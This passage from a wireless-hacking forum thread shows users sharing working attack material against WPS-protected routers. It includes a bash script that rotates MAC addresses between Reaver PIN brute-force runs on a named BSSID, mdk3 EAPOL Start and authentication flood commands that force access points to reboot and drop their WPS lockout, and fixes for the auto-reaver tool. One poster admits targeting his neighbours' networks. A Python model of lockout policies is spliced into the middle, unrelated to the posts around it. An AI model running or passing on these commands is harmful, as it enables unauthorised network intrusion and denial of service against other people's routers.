    I ran reaver without using the -m flag (since i have already used macchanger to change my mac instead of giving reaver this option)and
    it successfully completed that diffie-hellman stage (message 1 and 2)!


    REVISED SCRIPT
    i have modified my script to change my physical and virtual interface to specific defined mac address.

    My script is now a little lengthy and it changes my mac address once after a pin is tried for 11 times and after that the script
    restarts itself(I am still reading a book on bash scripting so i supposed once i finised this book i will find a way to reduce this script length.


    YOUR OPONION

    What is your opinion on the new measures enacted for wps security?. I have tried my revised script and it seems that changing my mac address
    at every pin attempt have no effect on the new cisco routers!. these router exponentially relates pin attempts with its wps locking feature..I observed that the more bad pin attempts tried the router locks up for longer period of time!.Also i am assessing another router that request both half of the pins at once which makes reaver believes that message 5 recieved means that the first half of the pin is correct!.
    I did some searching on the web and found that this is a new measure for wps 2.0 version.seems like this sweet little program, reaver, was
    taken seriously..haha..


    however my revised script is below
    #!/bin/bash
    #Changing Mac Address to random Mac Address
    while :; do echo
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 mon0;
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #SECOND TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 3a:d8:5a:9e:d2:f7 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 3a:d8:5a:9e:d2:f7 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #THIRD TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m aa:6d:9b:58:f0:83 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m aa:6d:9b:58:f0:83 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #FOURTH TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 9a:92:2f:79:69:f1 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 9a:92:2f:79:69:f1 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4\n";
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #FIFTH TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    ### THIS PROCESS GOES ON UNTIL THE ATTEMPTS END AND RESTARTS

  20. #20
    Join Date
    2013-Jul
    Posts
    844
    To repzeroworld

    Reference your MAC changing script for reaver - again you are using the wrong initial commands and you have failed to put a --mac=00:11:22:33:44:55 in the reaver command line.

    There is a bash program that does this for you. Download varmacreaver.sh at
    http://www.axifile.com/en/CFC3101780

    Reference firmware WPS locking. These forums have a wealth of info. Search WPS lock and resetting routers.

    We have never gotten MAC changing to work when using virtual programs.

    MTC

  21. #21
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by mmusket33 View Post
    To repzeroworld

    Reference your MAC changing script for reaver - again you are using the wrong initial commands and you have failed to put a --mac=00:11:22:33:44:55 in the reaver command line.

    There is a bash program that does this for you. Download varmacreaver.sh at
    http://www.axifile.com/en/CFC3101780

    Reference firmware WPS locking. These forums have a wealth of info. Search WPS lock and resetting routers.

    We have never gotten MAC changing to work when using virtual programs.

    MTC
    I prefer to use my own since it works well. Thank you and have a great day!


    COMMON SENSE
    By the way, reading the Reaver help tutorial shows that you only use the --mac flag, which gives Reaver the option of spoofing your MAC address on the monitor interface IF YOU HAVEN'T DONE THAT WITH ANY OTHER UTILITY for the MONITOR INTERFACE, as seen from the example. I have already spoofed my MAC address on the monitor interface with macchanger instead of giving Reaver this option. I prefer to end this discussion with your team since it appears that you are not open to new ideas and thinking, which I detest. It also seems that you are imposing your own script on people! Thank you and have a great day!
    Last edited by repzeroworld; 2014-03-23 at 20:10.

  22. #22
    Join Date
    2013-Jun
    Posts
    125
    TO: EVERYONE- EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
    I have found a way to effectively flood a new model (manufactured in either 2012 or 2013) Cisco router to make it reboot with WPS locked
    status "NO". Also I will prove that using Authentication DoS mode flooding has no effect on THIS router!


    DETAILS OF THIS ROUTER

    From one of the M1 EAP packets captured from my wireless card, details of this router are as follows

    bssid c8:d7:19:0a:bf:35
    Manufacturer: Cisco
    Model Number: 123
    Serial Number: 12345
    Model Name: WAP
    Channel type: 802.11g (pure-g) (0x00c0)

    I did some research using these details and found out that this access point was modern in age.

    Behaviour of this CISCO Router

    This type of router is not affected by a script changing your MAC address. Also, if you try 3 pins, the router starts
    an exponential clock that rate-limits another couple of pins Reaver tries, and then the router totally locks itself for one or two days.
    Even if I gave Reaver the option to try 1 pin every 3 minutes (worthless), after a couple of pin attempts it locks up for one or two days.
    I will release my method for sure; give me a couple of days for a nice video presentation!

    EFFECTS OF USING MY METHOD

    I haven't seen anyone discussing the method which I am going to reveal, but it involves using mdk3.

    After using my method the router reboots and it needs some time to "thaw out" before sending EAP again; this is roughly around
    a couple of seconds. If you don't leave it to thaw out and use the reaver command, you will receive a lot of EAP timeout messages before
    the router catches itself, but it is worth it rather than waiting for days for the router to unlock itself!! Also, it hops to another channel when it reboots, so it
    is not wise to run Reaver with a -c flag. I suppose this COULD be part of Cisco's security mechanism feature.
    I am out for now.
    Upon making a nice video presentation to prove this, I will release this information!

  23. #23
    Join Date
    2013-Jun
    Posts
    125

    To everyone-another effective method to unlock wps mechanism on a wps router!

    Quote Originally Posted by repzeroworld View Post
    TO: EVERYONE- EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
    I have found a way to effectively flood a new model (manufactured in either 2012 or 2013) Cisco router to make it reboot with WPS locked
    status "NO". Also I will prove that using Authentication DoS mode flooding has no effect on THIS router!


    DETAILS OF THIS ROUTER

    From one of the M1 EAP packets captured from my wireless card, details of this router are as follows

    bssid c8:d7:19:0a:bf:35
    Manufacturer: Cisco
    Model Number: 123
    Serial Number: 12345
    Model Name: WAP
    Channel type: 802.11g (pure-g) (0x00c0)

    I did some research using these details and found out that this access point was modern in age.

    Behaviour of this CISCO Router

    This type of router is not affected by a script changing your MAC address. Also, if you try 3 pins, the router starts
    an exponential clock that rate-limits another couple of pins Reaver tries, and then the router totally locks itself for one or two days.
    Even if I gave Reaver the option to try 1 pin every 3 minutes (worthless), after a couple of pin attempts it locks up for one or two days.
    I will release my method for sure; give me a couple of days for a nice video presentation!

    EFFECTS OF USING MY METHOD

    I haven't seen anyone discussing the method which I am going to reveal, but it involves using mdk3.

    After using my method the router reboots and it needs some time to "thaw out" before sending EAP again; this is roughly around
    a couple of seconds. If you don't leave it to thaw out and use the reaver command, you will receive a lot of EAP timeout messages before
    the router catches itself, but it is worth it rather than waiting for days for the router to unlock itself!! Also, it hops to another channel when it reboots, so it
    is not wise to run Reaver with a -c flag. I suppose this COULD be part of Cisco's security mechanism feature.
    I am out for now.
    Upon making a nice video presentation to prove this, I will release this information!

    ANOTHER EFFECTIVE WAY TO REBOOT A WPS ACCESS POINT AND RESET WPS LOCKED STATUS TO “NO”

    THIS LINK *REMOVED* IS A VIDEO I HAVE DONE TO SHOW HOW I USE THE TWO ATTACKS AND WHICH ONE WAS MORE EFFECTIVE WITH THIS PARTICULAR AP.

    BRIEF NOTES
    I focused on the stated Cisco Access Point that I came across with the new exponential wps mechanism.

    THE TWO ATTACKS I USED ARE:
    1. MDK3 Authentication DoS Flood Attack: floods the AP with too many fake clients so that the router is overloaded.
    2. EAPOL Start Flood Attack: authenticates to the AP and sends too many EAPOL Start requests so that the router is unable to respond to the volume of EAPOL requests and reboots itself.

    MDK3 AUTHENTICATION DOS FLOOD ATTACK
    This attack is useful on SOME routers. The important point to note is HOW I USE THESE ATTACKS!
    (I have three wireless adapters, AWUS036NHA, AWUS036NH and TP-LINK 722N, and I used the AWUS036NHA and AWUS036NH to carry out this attack numerous times.)
    HOW I ATTACKED THIS ACCESS POINT USING THE AUTHENTICATION DOS FLOOD ATTACK
    I started my wireless cards on three monitor interfaces, mon0, mon1 and mon2.
    In three terminals, I used the command lines
    mdk3 mon0 a -a C87:19:0A:BF:35 #TERMINAL 1
    mdk3 mon1 a -a " " " # TERMINAL 2
    mdk3 mon1 a -a " " " #TERMINAL 3
    Note:
    I ensured that the router was WPS locked permanently so that I could test the effectiveness of the attack. Also, a point to note: I did not use one command line with one monitor interface, since it was futile. I blasted the router on three monitor interfaces! Now I am blasting away at the router for hours! After blasting away, the Access Point is still locked! I tried this attack for days to convince myself!


    MDK3 EAPOL START FLOOD ATTACK

    I started my wireless cards on three monitor interfaces, mon0, mon1 and mon2.
    mdk3 mon1 x 0 -t C87:19:0A:BF:35 -n Riznet -s 100 #TERMINAL 1 (SEE VIDEO FOR THE REASON FOR USING THE -s 100 FLAG)
    mdk3 mon1 x 0 -t " " " -n Riznet -s 100 # TERMINAL 2
    mdk3 mon1 x 0 -t " " " -n Riznet -s 100 #TERMINAL 3
    Note: I tried again using 1 monitor interface to carry out the attack, but it took hours for the router to reboot and I was not sure if the attack was the main reason for the router rebooting! In this scenario I tried blasting the router in three terminals. This "Shock Attack" method ran for about 20 seconds and the router rebooted with WPS locked status "NO". I TRIED THIS ATTACK A COUPLE MORE TIMES FOR ABOUT 20 SECONDS, WITH THE ACCESS POINT REBOOTING AND UNLOCKING ITSELF (WPS)!! Also, packet analysis significantly helped me to understand the connection between EAPOL and a router's behaviour towards open authentication requests, which makes it impossible to stick to one method for flooding ALL APs (see the video link above).

    BASH SCRIPT WRITING
    Soon I will write a bash script to execute all the steps in my video (I need time to chill...).

    OTHER ACCESS POINTS INVESTIGATED
    I have also assessed the behaviour of three other Cisco Access Points that rate-limit pins in a systematic way but did not lock up in an exponential manner! I will give an update if I come across any other access points that behave somewhat differently. Do share your experience in relation to any new updates on WPS!
    Last edited by g0tmi1k; 2014-12-11 at 10:59. Reason: Youtube
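    The posts above describe the defender-side mechanism at work: after a few bad PINs the AP locks WPS, each lock lasts longer than the last, and rotating the client MAC made no difference on the newer Cisco AP. The following is an added example, not code from the thread or from Reaver, mdk3 or any vendor firmware: it models that AP-side lockout policy and contrasts a per-client lockout (sidestepped by MAC rotation) with an AP-wide one (not sidestepped). The threshold, lock durations and client MACs are constructed assumptions.

```python
"""Model of AP-side WPS PIN-attempt lockout policies (added example).

Simulates the access-point behaviour described in the thread: after a few
bad PINs the AP locks WPS, and each successive lock lasts longer. It
contrasts a per-client lockout, which a client that rotates its MAC address
can sidestep, with an AP-wide lockout, which is why rotating MACs had no
effect on the newer Cisco AP. Thresholds and durations are assumptions,
not any vendor's real values.
"""
from dataclasses import dataclass, field


@dataclass
class WpsLockoutPolicy:
    per_client: bool             # True: count failures per client MAC; False: AP-wide
    threshold: int = 3           # bad PINs before the first lock (assumed)
    base_lock_s: int = 60        # first lock length in seconds (assumed)
    max_lock_s: int = 2 * 86400  # cap at two days, the longest lock the posts report (assumed)
    _failures: dict = field(default_factory=dict)
    _locked_until: dict = field(default_factory=dict)
    _lock_count: dict = field(default_factory=dict)

    def _key(self, mac: str) -> str:
        # A per-client policy keeps separate state for each MAC; an AP-wide
        # policy collapses every client onto one shared record.
        return mac.lower() if self.per_client else "*"

    def is_locked(self, mac: str, now: float) -> bool:
        return now < self._locked_until.get(self._key(mac), 0)

    def attempt(self, mac: str, pin_ok: bool, now: float) -> str:
        """Register one PIN attempt at time `now`; return 'locked', 'ok' or 'bad'."""
        k = self._key(mac)
        if self.is_locked(mac, now):
            return "locked"          # enrollee is refused while the lock holds
        if pin_ok:
            self._failures[k] = 0
            return "ok"
        self._failures[k] = self._failures.get(k, 0) + 1
        if self._failures[k] >= self.threshold:
            n = self._lock_count.get(k, 0)
            # Exponential back-off: each lock is twice as long as the previous one.
            self._locked_until[k] = now + min(self.base_lock_s * 2 ** n, self.max_lock_s)
            self._lock_count[k] = n + 1
            self._failures[k] = 0
        return "bad"


def guesses_accepted(policy: WpsLockoutPolicy, macs, per_mac: int, now: float = 0) -> int:
    """How many bad PIN guesses the AP actually evaluates when a client cycles
    through `macs`, sending `per_mac` guesses from each, all at time `now`."""
    accepted = 0
    for mac in macs:
        for _ in range(per_mac):
            if policy.attempt(mac, False, now) == "bad":
                accepted += 1
    return accepted


if __name__ == "__main__":
    # Constructed, locally administered client MACs standing in for a MAC rotation.
    rotating = ["02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"]
    weak = WpsLockoutPolicy(per_client=True)
    strong = WpsLockoutPolicy(per_client=False)
    print("per-client lockout evaluates", guesses_accepted(weak, rotating, 10), "guesses")
    print("AP-wide lockout evaluates   ", guesses_accepted(strong, rotating, 10), "guesses")
```

With the assumed threshold of 3, the per-client policy evaluates 9 guesses across three MACs while the AP-wide policy evaluates only 3 and then refuses every client until the lock expires.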

  24. #24
    Join Date
    2014-Feb
    Posts
    14
    Pardon me, I'm a noob, but does the AP block the MAC or the WPS service for every client?

  25. #25
    Join Date
    2014-Apr
    Posts
    4
    Great post repzeroworld! I'll try this today.

  26. #26
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by i6l6l6u View Post
    pardon me I'm a noob, but block the AP the MAC or the service wps 4 ewery client?
    I didn't get you clearly, my friend.

  27. #27
    Join Date
    2014-Feb
    Posts
    14
    Quote Originally Posted by repzeroworld View Post
    I didn't get you clear my friend.
    Thanks for your answer. Since you've responded, could you answer the question too, my friend? That would be more worthwhile.

  28. #28
    Join Date
    2013-Jun
    Posts
    125
    TO: EVERYONE-THREE OTHER ACCESS POINTS THAT WERE DEFEATED BY THE MDK3 EAPOL START ATTACK!!
    I have underestimated this attack! IT WORKS ON ALMOST ALL THE APs THAT I PICKED UP THAT HAVE THE WPS RATE LIMITING FEATURE.
    Although some APs refuse to accept too many EAPOL packets, once mdk3 authenticates it floods the AP quickly until a deauthentication
    packet is sent from the AP to break the connection.

    FOR FURTHER PROOF, CHECK ANOTHER VIDEO POSTED ON MY CHANNEL

    LINK *REMOVED*

    Also, instead of running three attacks in three terminals, I used one terminal to carry out three attacks RUNNING AT THE SAME TIME using

    EXAMPLE
    #timeout <seconds> mdk3 mon0 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon1 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon2 x 0 -t <bssid> -n <essid> -s <no. of packets/sec>

    PENDING: I AM CURRENTLY WRITING A GENERAL INTERACTIVE BASH SCRIPT TO CARRY OUT ANY MDK3 ATTACK USING MY METHOD WITH REAVER! I WILL POST ONCE FULLY FINISHED.
    IF ANYONE HAS A SCRIPT FOR REAVER AND MDK3 (TO CARRY OUT ANY ATTACKS) DO SHARE SO THAT I CAN COMPARE IT WITH MY WORK-IN-PROGRESS SCRIPT!
    Last edited by g0tmi1k; 2014-12-09 at 14:46. Reason: Youtube

  29. #29
    Join Date
    2013-Jun
    Posts
    125
    thank you itmanvn!

  30. #30
    So if I understand correctly, you have to make the router restart after a couple of pin tries?
    If this is the case, then won't it make the Reaver attack take a much longer time to get the WPS PIN?
    I am trying this on my DOCSIS 3.0 router because it locks the WPS. But this router takes around 2 minutes to restart!
    Is there any way to get past it without having to restart the router a lot?
    Last edited by luckybanger7; 2014-06-26 at 10:13.

  31. #31
    Join Date
    2014-Jun
    Posts
    1
    If you have trouble with the WPS Locked situation, consider using my script:
    https://code.google.com/p/auto-reaver/
    Best Regards!

  32. #32
    Join Date
    2013-Oct
    Posts
    10
    Awesome script repzeroworld.

    For all interested, I put a Reaver Pro vs. ReVdK3-r1.sh video up on youtube as a demonstration:
    *REMOVED*

    If you don't mind constructive criticism:

    I would add checks for gnome-terminal && apt-get install gnome-terminal.
    I had difficulties porting the script to be used with a different (less bloated) terminal client, right now I have a somewhat working version that does not call for gnome-terminal but runs the entire script in one terminal window only.

    Sometimes I have ctrl-c errors; sometimes after quitting I have to ifconfig wlan0 up again.

    Maybe add some wpa_cli commands to connect to the client's WPS-protected router upon cracking the PIN#

    wpa_cli wps_reg [ap mac addy] [wps pin#] (connects interface to AP using PIN#)

    dhclient wlan0 (requests an IP address from the AP)

    wpa_cli scan_results | grep WPS (will show WPS-protected APs, kind of like a wash alternative)

    Email pin# to $emailaddress upon successful completion.

    Again, way to go. This is an awesome reaver helper tool.
    Last edited by g0tmi1k; 2014-12-09 at 14:47. Reason: Youtube

  33. #33
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams feel the program autoreaver is a significant step forward in defeating attempts by programmers to block reaver through alterations in the router's firmware.

    We are slowly working through this program. The first major obstacle we encountered was getting the washAutoReaverList program to write the list. We think the problem is in the awk portion of the command string, as we only got the program to write the list once. Rather than spend time debugging, we used the following simple solution:

    cd auto-reaver
    ./wash > myAPTargets

    Now go to the exampleAPList. Rewrite myAPTargets so that it matches the format in the exampleAPList file. You can also remove targets you do not want to crack.

    In closing, when consulting the Google help file, some of the file names referenced in the help file do not match the actual file names found in the folder.

    We are still working through the possibilities available in this nice script.

    MTA

  34. #34
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by 0E 800 View Post
    Awesome script repzeroworld.

    For all interested, I put a Reaver Pro vs. ReVdK3-r1.sh video up on youtube as a demonstration:
    *REMOVED*

    If you don't mind constructive criticism:

    I would add checks for gnome-terminal && apt-get install gnome-terminal.
    I had difficulties porting the script to be used with a different (less bloated) terminal client, right now I have a somewhat working version that does not call for gnome-terminal but runs the entire script in one terminal window only.

    Sometimes I have ctrl-c errors; sometimes after quitting I have to ifconfig wlan0 up again.

    Maybe add some wpa_cli commands to connect to the client's WPS-protected router upon cracking the PIN#

    wpa_cli wps_reg [ap mac addy] [wps pin#] (connects interface to AP using PIN#)

    dhclient wlan0 (requests an IP address from the AP)

    wpa_cli scan_results | grep WPS (will show WPS-protected APs, kind of like a wash alternative)

    Email pin# to $emailaddress upon successful completion.

    Again, way to go. This is an awesome reaver helper tool.
    Thank you... I will make a note of your suggestions, especially the one where the script does not bring wlan0 up after quitting! If I do embark on another revision of the script I will put this in place and rewrite the script in Python, since it is a wonderful programming language... cheers!
    Last edited by g0tmi1k; 2014-12-09 at 14:47. Reason: Youtube

  35. #35
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams wish to report that auto-reaver cannot be run in Kali Linux but does run fine in BT5R3. As this is a Kali Linux forum we will wait till the author rewrites this program specifically for Kali Linux.

  36. #36
    Join Date
    2014-Jul
    Posts
    1
    Quote Originally Posted by mmusket33 View Post
    Musket Teams wish to report that auto-reaver cannot be run in Kali Linux but does run fine in BT5R3. As this is a Kali Linux forum we will wait till the author rewrites this program specifically for Kali Linux.

    Hi,

    Don't know yet the effectiveness of the auto-reaver script when running in Kali Linux (newbie here).
    To make it executable in Kali (live USB) I did the following changes:

    - Added missing function "echoBlue" to autoreaver file:
    echoBlue(){
    echo -e "\033[1m\E[34m$@\033[0m"
    }
    - Changed WIFI_DRIVER in resetWifiCard() function in autoreaver file to match my wi-fi card driver:
    - local WIFI_DRIVER="kernel wireless driver name"
    Note: use "lspci" command to get driver address; use "lspci -vv -s driver_address" to get the driver name;

    -Installed "gawk" extension:
    http://www.chemie.fu-berlin.de/chemn...k/gawk_20.html

    - To create the AP list I execute "wash > myAPTargets" and then edit myAPTargets to the same format as the exampleAPList file.

    Other small changes so i could run in Kali Live USB:
    - Changed REAVER_SESSION in "configurationSettings" to "/etc/reaver"

    I am currently running Auto-Reaver in Kali and it seems that APs get blocked after 2 pin attempts (no MAC changing at this point)... this is my neighbours' AP list so I don't know the AP manufacturers.


    Cheers

  37. #37
    Join Date
    2013-Jul
    Posts
    844
    Thanx Linton, our teams did not have the time to debug the program as we are working on other projects. Hopefully the author will rewrite it for Kali Linux and publish. We will make the changes and test this program's possibilities and report back anything of interest we find here.

    MTB

  38. #38
    Join Date
    2013-Jul
    Posts
    844
    Linton

    Reference the autoReaver rewrite for kali-linux
    Your suggestions have worked great. Here is how we did it

    - We added the missing function "echoBlue" to the autoreaver file:

    echoBlue(){
    echo -e "\033[1m\E[34m$@\033[0m"
    }

    Altered the configuration settings file in the auto-reaver folder to read /etc/reaver

    We updated awk with

    apt-get install original-awk

    then

    apt-get install gawk

    We had problems finding the driver with lspci etc so we used airmon-ng and got the driver that way

    We changed

    local WIFI_DRIVER=$(getWifiCardDriver);

    to read

    local WIFI_DRIVER=rtl8187

    The preliminary functions seem to work in our lab. We have to load another computer closer to test targets to see if it is functioning. Will advise

    MTB

  39. #39
    Join Date
    2014-Jan
    Posts
    2
    Can you post link for modified files so we can test it in Kali Linux ?

  40. #40
    Join Date
    2013-Jul
    Posts
    844
    Further debugging of autoReaver

    When we tried to run autoReaver in a Hard drive install of Kali-linux 1.07 we were unable to install

    apt-get install original-awk
    apt-get install gawk

    We got warnings that mawk was in residence and when we tested autoReaver against real AP targets we got numerous gawk line errors. To solve this we changed all gawk entries to mawk. We left awk entries in place. The program ran fine after that.

    Note this only applied to our HD install.

    MTF
    Last edited by mmusket33; 2014-07-02 at 10:43.

  41. #41
    Join Date
    2013-Jul
    Posts
    844
    To Ed1i

    The link for the original file is in this thread. The author has written an extensive help file at the download address. All the info you need to rewrite for Kali Linux is seen above. We suggest you first update your Kali Linux before you try the apt-get install suggestions we posted.
    We are not the authors of this program so I suggest you write the author and he might do the rewrite for kali-linux and post for you. Otherwise just follow the simple suggestions provided by Linton and confirmed by Musket Teams.

    MTB

  42. #42
    Join Date
    2014-Jul
    Posts
    2
    Does anybody know what it means when wash returns an AP as (null) instead of NO or YES as to whether WPS is locked? Also note that the same AP was showing NO before I tried the Reaver attack. Thank you.

  43. #43
    Join Date
    2013-Jul
    Posts
    844
    Reference the washAutoReaverList script in the auto-reaver program. We spent hours trying to debug the code but the awk function would not work properly. Using a Kali 1.08 persistent USB we then simply installed gawk

    apt-get install gawk

    After this the washAutoReaverList script in autoreaver functioned perfectly. The main autoreaver script still needs to be rewritten as indicated in this thread.

    MTC

  44. #44
    Join Date
    2015-Mar
    Posts
    1

    Mac Address Rotation

    Hey guys,

    With the blocking that I am getting, it makes sense to have a rotating MAC address to continue with the exploit. Is there a way to tell the MAC address to automatically change on every attempt?

    thanks for any help...

    Quote Originally Posted by soxrok2212 View Post
    Check out my post (register mentioned it above also). You can use MDK3 to DOS the router which MAY cause it to reboot and unlock WPS for a little while.

  45. #45
    Quote Originally Posted by sirjohn View Post
    Hey guys,

    With the blocking that I am getting, it makes sense to have a rotating MAC address to continue with the exploit. Is there a way to tell the MAC address to automatically change on every attempt?

    thanks for any help...
    Same question

  46. #46
    Join Date
    2013-Jul
    Posts
    844
    Rotating the MAC address has little to no effect. Go to the WPS Reaver site and read through issues 675, 676 and 677 and download vmr-mdk2x. Find the latest version, or look in the aircrack-ng forums; the download links are there as well.

    MTeams
